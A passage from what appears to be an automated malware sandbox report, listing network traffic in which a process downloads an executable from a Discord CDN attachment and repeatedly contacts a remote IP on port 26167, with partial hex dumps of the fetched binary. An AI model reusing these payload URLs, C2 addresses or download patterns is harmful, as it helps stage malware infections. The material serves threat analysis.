                                                                          Sep 19, 2023 09:21:50.843585014 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843590975 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843616009 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843640089 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.843849897 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.843996048 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844003916 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844017029 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844110966 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844118118 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844239950 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844295979 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844302893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844396114 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844461918 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844469070 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844552994 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844605923 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844613075 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844731092 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844786882 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844794989 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844903946 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.844965935 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.844974041 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.845026970 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.932219028 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.932468891 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.932837009 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933170080 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.933479071 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933609962 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933685064 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.933685064 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.933708906 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.933760881 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.934134007 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.934201956 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.934223890 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.934284925 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935096979 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935159922 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935183048 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935239077 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935611010 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935678959 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.935745001 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.935806036 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.936367035 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.936429024 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.936573029 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.936645031 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.937220097 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.937288046 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.937374115 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.937436104 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.937977076 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.938040972 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:50.938292980 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:50.938354969 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.023633957 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.023807049 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.023828983 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.023893118 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.023993015 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.024097919 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.024163961 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.024766922 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.024823904 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.025016069 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.025077105 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.025559902 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.025778055 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.025994062 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.026011944 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.026021004 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.026191950 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.026789904 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.026957989 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027060986 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.027067900 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027215004 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.027221918 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027394056 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027448893 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.027456999 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.027513027 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028127909 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.028186083 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028234959 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.028289080 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028796911 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.028945923 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.028959036 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.029046059 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.029722929 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.029778957 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.030142069 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.030206919 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.030284882 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.030345917 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.030451059 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.030509949 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.031228065 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.031286001 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.031397104 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.031464100 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.032025099 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.032080889 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.032299042 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.032350063 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.033549070 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.033605099 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.033972025 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.033979893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.034171104 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.035454988 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.035499096 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.035518885 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.035526037 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.035681009 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.037091017 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.037131071 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.037158966 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.037166119 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.037184000 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.037204981 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.038289070 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.038331985 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.038357019 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.038363934 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.038526058 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.040133953 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.040177107 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.040215969 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.040221930 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.040249109 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.040265083 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.041804075 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.041879892 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.042495012 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.042557955 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.043559074 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.043575048 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.043613911 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.043618917 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.043641090 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.043658972 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.072258949 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.072273970 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.072351933 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.072357893 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.072607040 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.115575075 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115602970 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115659952 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.115664959 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115677118 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.115763903 CEST44349729162.159.133.233192.168.2.4
                                                                          Sep 19, 2023 09:21:51.116014957 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:21:51.117609978 CEST49729443192.168.2.4162.159.133.233
                                                                          Sep 19, 2023 09:22:09.932579994 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:22:10.027798891 CEST8049728162.159.135.233192.168.2.4
                                                                          Sep 19, 2023 09:22:10.027952909 CEST4972880192.168.2.4162.159.135.233
                                                                          Sep 19, 2023 09:22:37.009490013 CEST4974226167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:37.241612911 CEST261674974291.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:37.744193077 CEST4974226167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:37.976795912 CEST261674974291.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:38.478666067 CEST4974226167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:38.725979090 CEST261674974291.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:43.902307034 CEST4974326167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:44.135832071 CEST261674974391.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:44.650326967 CEST4974326167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:44.882632017 CEST261674974391.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:45.384659052 CEST4974326167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:45.621221066 CEST261674974391.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:50.635395050 CEST4974526167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:50.868858099 CEST261674974591.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:51.384639025 CEST4974526167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:51.617410898 CEST261674974591.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:52.118999958 CEST4974526167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:52.350366116 CEST261674974591.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:57.355782986 CEST4974626167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:57.592747927 CEST261674974691.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:58.103336096 CEST4974626167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:58.336198092 CEST261674974691.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:22:58.837760925 CEST4974626167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:22:59.071944952 CEST261674974691.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:23:04.088247061 CEST4974726167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:23:04.320441008 CEST261674974791.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:23:04.822021961 CEST4974726167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:23:05.053781986 CEST261674974791.207.102.163192.168.2.4
                                                                          Sep 19, 2023 09:23:05.556384087 CEST4974726167192.168.2.491.207.102.163
                                                                          Sep 19, 2023 09:23:05.788189888 CEST261674974791.207.102.163192.168.2.4

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Sep 19, 2023 09:21:49.959867954 CEST6452253192.168.2.48.8.8.8
                                                                          Sep 19, 2023 09:21:50.058835030 CEST53645228.8.8.8192.168.2.4
                                                                          Sep 19, 2023 09:21:50.282275915 CEST5365353192.168.2.48.8.8.8
                                                                          Sep 19, 2023 09:21:50.383383989 CEST53536538.8.8.8192.168.2.4

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                          Sep 19, 2023 09:21:49.959867954 CEST192.168.2.48.8.8.80x9d3cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.282275915 CEST192.168.2.48.8.8.80xbb41Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                          Sep 19, 2023 09:21:50.058835030 CEST8.8.8.8192.168.2.40x9d3cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST8.8.8.8192.168.2.40x9d3cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST8.8.8.8192.168.2.40x9d3cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST8.8.8.8192.168.2.40x9d3cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.058835030 CEST8.8.8.8192.168.2.40x9d3cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST8.8.8.8192.168.2.40xbb41No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST8.8.8.8192.168.2.40xbb41No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST8.8.8.8192.168.2.40xbb41No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST8.8.8.8192.168.2.40xbb41No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                          Sep 19, 2023 09:21:50.383383989 CEST8.8.8.8192.168.2.40xbb41No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false

                                                                          HTTP Request Dependency Graph

                                                                          • cdn.discordapp.com

                                                                          HTTP Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.449729162.159.133.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          TimestampkBytes transferredDirectionData


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          1192.168.2.449728162.159.135.23380C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Sep 19, 2023 09:21:50.166960001 CEST550OUTGET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                          Host: cdn.discordapp.com
                                                                          Connection: Keep-Alive
                                                                          Sep 19, 2023 09:21:50.267458916 CEST559INHTTP/1.1 301 Moved Permanently
                                                                          Date: Tue, 19 Sep 2023 07:21:50 GMT
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Cache-Control: max-age=3600
                                                                          Expires: Tue, 19 Sep 2023 08:21:50 GMT
                                                                          Location: https://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                          Set-Cookie: __cf_bm=_5mG6bEZAsIeLteYk3.8Jt5w.5KXuOdmMwmWuI6HywA-1695108110-0-AZjiK3LAiPpnzako259F4D3G7h2mprEFaRjJk4/yRZ3aNrSo+oLubbDlQ0TK1jXiRXvgBvF3RIyhHMNedNYuuDE=; path=/; expires=Tue, 19-Sep-23 07:51:50 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q38lILdTjuTmBjy3TnzZmprjU3APfHGzEThrXYn1b%2FesBCj29F%2BeO5zAZw1Nrh0F4Ag2JNGt9w7WcJDVxZpuMe1Xw66EcVQwtDuV0VA%2B6rqP3Bgq3GUTlkBcDVRSfcnQGmukVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 809012f8b9198c1d-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.2.449729162.159.133.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-09-19 07:21:50 UTC0OUTGET /attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                          Host: cdn.discordapp.com
                                                                          Connection: Keep-Alive
                                                                          2023-09-19 07:21:50 UTC0INHTTP/1.1 200 OK
                                                                          Date: Tue, 19 Sep 2023 07:21:50 GMT
                                                                          Content-Type: application/x-msdos-program
                                                                          Content-Length: 363008
                                                                          Connection: close
                                                                          CF-Ray: 809012fc39de4297-EWR
                                                                          CF-Cache-Status: HIT
                                                                          Accept-Ranges: bytes
                                                                          Age: 49634
                                                                          Cache-Control: public, max-age=31536000
                                                                          Content-Disposition: attachment; filename="Vvdsupbjet.exe"
                                                                          ETag: "5ca8de5b7c87d36341f0578a03615aee"
                                                                          Expires: Wed, 18 Sep 2024 07:21:50 GMT
                                                                          Last-Modified: Mon, 18 Sep 2023 04:48:46 GMT
                                                                          Vary: Accept-Encoding
                                                                          Alt-Svc: h3=":443"; ma=86400
                                                                          x-goog-generation: 1695012526172444
                                                                          x-goog-hash: crc32c=0GJROA==
                                                                          x-goog-hash: md5=XKjeW3yH02NB8FeKA2Fa7g==
                                                                          x-goog-metageneration: 1
                                                                          x-goog-storage-class: STANDARD
                                                                          x-goog-stored-content-encoding: identity
                                                                          x-goog-stored-content-length: 363008
                                                                          X-GUploader-UploadID: ADPycduhLZDKx3Qhh_uQjnlh2PZ1LYFC9YYOuRiAvpCR6ZV3WKWwXRROHFATpkHK6zun6q5TwG3URarDiBhLV6ZeheeINpAe9wN7
                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                          Set-Cookie: __cf_bm=UkBafX0.MiYL.C5dXQv64aU3YYRgPNg1J8jjg70NcMw-1695108110-0-AR+vXXFVIH5eUM0yEbeW2pzc+wO/JYvlXE45LtLB9TN16igpvW6yNc8BJHL33S6OfNihz6tt6PvNRowy860XiqY=; path=/; expires=Tue, 19-Sep-23 07:51:50 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                          2023-09-19 07:21:50 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 4c 52 65 75 4e 6f 6a 6b 55 62 58 6a 63 48 56 77 76 38 55 66 6e 68 70 4b 42 58 78 64 4a 62 71 46 52 43 4d 6e 59 6c 4d 4e 39 41 61 77 6e 63 54 69 4c 48 32 6d 4b 47 4d 4e 39 79 44 4f 58 37 78 79 75 25 32 46 71 44 73 4b 74 69 6c 49 73 53 48 4d 62 63 66 50 62 42 59 6e 42 41 72 30 52 53 4c 68 4f 6a 74 66 51 33 54 35 6c 50 63 6d 79 6e 79 56 66 6b 6d 61 45 39 4d 65 79 68 65 34 36 70 48 71 4e 67 33 55 31 77 68 77 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                          Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LReuNojkUbXjcHVwv8UfnhpKBXxdJbqFRCMnYlMN9AawncTiLH2mKGMN9yDOX7xyu%2FqDsKtilIsSHMbcfPbBYnBAr0RSLhOjtfQ3T5lPcmynyVfkmaE9Meyhe46pHqNg3U1whw%3D%3D"}],"group":"cf-nel","max_age":6048
                                                                          2023-09-19 07:21:50 UTC1INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7c d1 07 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 1a 05 00 00 6e 00 00 00 00 00 00 ae 38 05 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 05 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL|en8 @ `
                                                                          2023-09-19 07:21:50 UTC3INData Raw: 00 00 00 04 00 00 11 02 28 23 00 00 06 03 12 00 6f 24 00 00 0a 3a 02 00 00 00 14 2a 06 2a 00 13 30 03 00 2d 00 00 00 00 00 00 00 02 28 23 00 00 06 03 6f 25 00 00 0a 39 0e 00 00 00 02 28 23 00 00 06 03 04 6f 26 00 00 0a 2a 02 28 23 00 00 06 03 04 6f 21 00 00 0a 2a 32 02 28 23 00 00 06 6f 27 00 00 0a 2a 4e 02 28 23 00 00 06 03 6f 28 00 00 0a 04 6f 24 00 00 0a 2a 00 00 13 30 03 00 39 00 00 00 05 00 00 11 03 6f 29 00 00 0a 0a 02 28 23 00 00 06 06 6f 25 00 00 0a 39 12 00 00 00 02 28 23 00 00 06 06 04 6f 26 00 00 0a 38 0d 00 00 00 02 28 23 00 00 06 06 04 6f 21 00 00 0a 17 2a 1e 02 28 2a 00 00 0a 2a 1e 02 7b 09 00 00 04 2a 22 02 03 7d 09 00 00 04 2a 1e 02 7b 0a 00 00 04 2a 22 02 03 7d 0a 00 00 04 2a 1e 02 7b 0b 00 00 04 2a 22 02 03 7d 0b 00 00 04 2a 3a 02 17 7d
                                                                          Data Ascii: (#o$:**0-(#o%9(#o&*(#o!*2(#o'*N(#o(o$*09o)(#o%9(#o&8(#o!*(**{*"}*{*"}*{*"}*:}
